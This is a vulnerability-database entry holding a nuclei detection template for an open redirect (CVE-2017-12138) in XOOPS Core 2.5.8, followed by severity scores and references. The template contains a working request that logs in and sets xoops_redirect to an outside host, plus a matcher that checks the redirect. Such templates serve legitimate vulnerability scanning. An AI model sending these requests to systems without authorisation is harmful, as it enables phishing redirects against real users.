Lucene search
K

XOOPS Core 2.5.8 - Open Redirect

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php. Attacker can redirect user to a malicious site to obtain sensitive information, modify data, or execute unauthorized operations

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
XOOPS Core /modules/profile/index.php redirection vulnerability
2 Aug 201700:00
cnvd
CVE
CVE-2017-12138
2 Aug 201705:00
cve
Cvelist
CVE-2017-12138
2 Aug 201705:00
cvelist
NVD
CVE-2017-12138
2 Aug 201705:29
nvd
Prion
Design/Logic Flaw
2 Aug 201705:29
prion
id: CVE-2017-12138

info:
  name: XOOPS Core 2.5.8 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability.
  reference:
    - https://github.com/XOOPS/XoopsCore25/issues/523
    - https://xoops.org
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12138
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-12138
    cwe-id: CWE-601
    epss-score: 0.03406
    epss-percentile: 0.8731
    cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: xoops
    product: xoops
  tags: cve,cve2017,redirect,xoops,authenticated,vuln

http:
  - raw:
      - |
        POST /user.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
      - |
        GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022073009b2127bea4bf73a9b3fca5641169f8607367c2fae28502006edbe3e8daf4022100f7a667367e32d9ebf4156f8f7d2166661be042877dccee3944a62f81350f89fa:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 36.1
EPSS0.03406
18